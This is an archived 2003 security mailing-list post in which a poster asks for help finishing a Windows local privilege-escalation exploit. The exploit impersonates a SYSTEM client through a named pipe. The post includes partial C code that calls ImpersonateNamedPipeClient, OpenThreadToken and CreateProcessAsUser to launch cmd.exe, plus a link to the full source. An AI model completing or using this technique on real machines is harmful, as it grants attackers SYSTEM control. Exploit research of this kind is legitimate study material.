Hello, I'm attempting to finish up my exploit for the @stake advisory, i've hit quite a snag when i found out that calling a new process does not inherit the privileges of the named pipe. (I must have been thinking of fork() or something heh). So I can impersonate SYSTEM, but I can not create a new process with these nice privileges. Here is where i am at: ConnectNamedPipe() <-- yada yada wait for connection if (!ImpersonateNamedPipeClient (hPipe)) // impersonate the pipe so we now are SYSTEM. { printf ("Failed to impersonate the named pipe.\n"); CloseHandle(hPipe); return 5; } // found this on msdn, i'm trying to get a token with full access, then call CreateProcessAsUser(); if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken )) { if (hToken != INVALID_HANDLE_VALUE) { CloseHandle(hToken); printf("damn: %u\n", GetLastError()); } } MapGenericMask( &dwAccessDesired, pGeneric ); //this i'm kinda shady on, looks like i'm just mapping the id to the SYSTEM name? when i call GetUserName i get garble after the OpenThreadToken unless i call MapGenericMask... CreateProcessAsUser(hToken, "cmd.exe", NULL,NULL,NULL,true,NULL,NULL,NULL,&si, &pi); CloseHandle(hPipe); now i call createprocessasuser, using the token from openthreadtoken. In the debugger, it tries to execute cmd, but but i get nothing back... if anyone wants to see my code it's at http://sh0dan.org/files/tac0tac0.c... Thanks this is starting to bug me :), -wire _____________________________ For the best comics, toys, movies, and more, please visit <http://www.tfaw.com/?qt=wmf>
This archive was generated by hypermail 2b30 : Mon Jul 14 2003 - 13:00:51 PDT